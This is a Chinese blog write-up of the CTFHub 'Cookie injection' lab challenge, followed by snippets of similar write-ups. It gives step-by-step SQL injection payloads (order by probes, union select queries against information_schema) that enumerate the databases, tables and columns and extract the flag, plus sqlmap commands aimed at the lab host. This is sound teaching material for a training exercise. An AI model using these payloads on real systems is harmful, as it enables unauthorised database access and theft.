CTFHub | Cookie注入

已于 2022-12-04 16:29:56 修改
阅读量1.8k 收藏 2
点赞数 3
分类专栏: CTF精进之路 文章标签: 数据库 web安全 CTF
于 2022-11-20 13:05:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/127944378
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

Cookie注入:

        (无)

  网页显示内容

         

        

0x02 解题过程

        根据网页显示内容提示,这题关于 Cookie 注入,Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。

        

使用Burpsuite工具对题目网站进行抓包

         

使用'and 1 = 1'进行测试,判断是否存在sql注入

and 1 = 1

        

使用’and 1 = 2'进行测试,回显错误,说明存在sql注入

and 1 = 2

        

使用order by 判断字段数量,从order by 1开始

order by 1

        

判断字段2,使用order by 2

order by 2

        

判断字段3,使用order by 3,这里无回显,那么字段数量为2列

order by 3

        

知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据

union select 1,2

        

判断数据可能不存在数据库中,在id=1中加入负号查看数据,其他符号也可以

id=-1 union select 1,2

        

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

union select 1,version()

        

修改2为database(),查看数据库名,发现数据库版本为sqli

union select 1,database()

        

ⅩⅠ查看全部数据库名

union select 1,group_concat(schema_name)from information_schema.schemata

        

ⅩⅡ在全部数据库名中发现sqli,最后在sqli数据库中发现news和mrqonpoxwm两个表名

union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

        

ⅩⅢ先查看mrqonpoxwm表中的全部字段名,发现一个数据名为umzfngtnsk

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='mrqonpoxwm'

        

ⅩⅣ查看数据umzfngtnsk中的内容,发现此题flag

union select 1,group_concat(umzfngtnsk) from sqli.mrqonpoxwm

        

        

0x03 Cookie 注入原理

        Cookie 注入的原理也和其他注入一样,只不过是将提交的参数已 Cookie 方式提交,而一般的注入是使用 GET 或者 POST 方式提交,GET 方式提交就是直接在网址后面加上需要注入的语句,POST 方式则是通过表单,GET 和 POST 的不同之处就在于可以通过 IE 地址栏处看到我们提交的参数,而 Cookie 注入却不能。

        

        

0x04 参考文献

[1].tooltime. cookie注入原理详解(一)[EB/OL]. [2022-11-20]. https://www.cnblogs.com/insane-Mr-Li/p/9142681.html.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
专栏目录
关于ctfhubcookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 728
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库表sqlmap -u "http://challenge-593b57751..
cookie注入CTFHUB靶场)
weixin_54105551的博客
09-10 1407
因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错。发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了。我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater。尝试一下用gagawesmtx这个表。得到数据库为sqli,然后开始爆表。
CTFHUB-Cookie注入
Web学习之路
03-28 242
cookie
CTFHub技能树之WEBCookie注入
weixin_48799157的博客
03-20 1531
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
CTFHub - Cookie注入
Have_a_great_day的博客
09-10 990
因为在CTFHubweb内SQL板块使用的是同一个数据库,所以列数是相同的。table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
CTFHub-web(cookie注入)
m0_64444909的博客
04-11 5186
文章目录前言一、解题步骤二、使用步骤1.引入库2.读入数据总结 前言 一、解题步骤 (1)题目为cookie注入,我们首先先看一下cookie里的值有没有什么可以帮助我们思考的东西,id=i,很明显存在sql注入 (2)我们抓包来一步步的进行注入会更方便一些 1.我们用order by 语句来排序查询数据库有几行 (1,2都可以回显,直到3时无法回显,说明数据库有两行) id=1 order by 3; 2.接下来用联合查询语句union select语句来注入,从而判断显示位 (回显Data:2 正常)
ctfhub cookie注入
Gi_iGablist的博客
11-01 143
首先,下载burpsuite,具体教程就不多说了,以下就用此工具完成这道题。 经过一系列步骤查找到数据库名:sqil,更换id:123+union++select+database(),2#, 查询表名 查询字段名 查询字段信息 拿到flag ...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 866
CTFHUB SQL
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 843
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFhub Cookie注入
plant1234的博客
06-18 761
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
sql注入预计完全体
2303_81631620的博客
04-04 903
Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站。
CTFHubCookie注入
sGanYu
07-26 1902
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
CTFHub-sql注入-Cookie注入
weixin_51706044的博客
06-06 1279
文章目录Cookie注入解法二 Cookie注入 cookie注入和以往的题目有所不同,注入点是在cookie中 查看该页面的Cookie 可以看到这里的Cookie是id=1 进行测试是否为Cookie注入 burp进行抓包注入 判断列数 可以看到列数为2的时候回显正常,因此判断列数为2 进行联合查询 爆数据库 id=1 union select 1,database() 爆数据表 id=13 union select 1,group_concat(table_name) from inf
CTF---Web---SQL注入---08---Cookie注入
qq_22160557的博客
07-31 405
文章目录前言一、题目描述二、解题步骤1、找注入点2、爆库、表、列、字段三、总结 前言 题目分类: CTFWeb—SQL注入—08—Cookie注入 一、题目描述 题目:cookie注入 二、解题步骤 1、找注入点 Step1:Cookie: id=0,1 union select 1,2,3 – l 此题的注入点是cookie中的id。 order by 只能在limit前使用,所以这里用不了order by,只能用union select 来判断字段数 2、爆库、表、列、字段 Step2:爆库 C
CTFHUB技能树之SQL——Cookie注入
最新发布
weixin_73049307的博客
10-17 428
看样子可能不在数据库中,老样子,改成-1 union select 1,2#(其实这一步不用爆也行,直接爆字段内容,下一步就是不写列名直接爆字段内容)(注意:不设置level的话没法爆破出数据库信息)发现没有注入点,猜测是Cookie注入。毕竟默认就是id=1。得到cxmdnrbzzo表和news表。爆出cxmdnrbzzo表了。爆出urweetotud列了。得到urweetotud列。回显错误,说明字段数是2。得到数据库名是sqli。爆出sqli数据库了。
CTFHub cookie注入 解析
qq_73722777的博客
04-21 251
打开环境只能看见一句话,网页源码也没有什么信息,于是我们查看抓包内容。可以看见cookie数据处有一行url编码,于是我们将其解码,得到。于是我们猜测存在sql注入,尝试构建payload。找到输出位点之后,就可以按照正常联合注入流程进行。于是我们尝试使用cookie传参。说明输出位为2,尝试查看输出点。当order by 3时。得到flag,此题结束。
CTFHUB-WEB-SQL注入-cookie注入
weixin_43486981的博客
08-11 908
利用cookie值进行注入(把cookie值作为注入点) 题目: 靶机环境:可以看到页面没有可以输入的地方,根据题目,想到利用cookie值输入 使用burp suite抓包,在cookie值处输入注入语句,进行注入 查看回显位 求数据库名 求表名 求列名 求字段值,即可得到flag ...
cookie注入
jihaichen的博客
05-04 315
语句: javascript:alert(document.cookie="id="+escape("137 and 1=1")); 
ctfweb题有什么技巧
04-05
作为AI语言模型,我并不会CTF,但以下是一些通用的技巧,可以帮助你在CTFWeb题中取得成功: 1. 深入了解HTTP协议和Web应用程序的基础知识,包括Cookie、Session、HTTP请求头和响应头等。 2. 熟悉基本的Web漏洞,如SQL注入、XSS、CSRF、文件包含、命令注入等。 3. 熟练使用Burp Suite等工具进行渗透测试和漏洞分析。 4. 熟悉各种Web框架和技术,如PHP、Python、Ruby on Rails等,并了解其安全问题。 5. 使用各种搜索引擎和漏洞库来查找可能的漏洞和解决方案。 6. 阅读源代码并理解其工作原理,以便找到可能的漏洞。 7. 了解常见的Web防御技术,如WAF、CSP、HSTS、HTTPS等,并尝试绕过它们。 8. 提高自己的编程能力和代码审计技能,以便更好地理解代码中的漏洞和解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值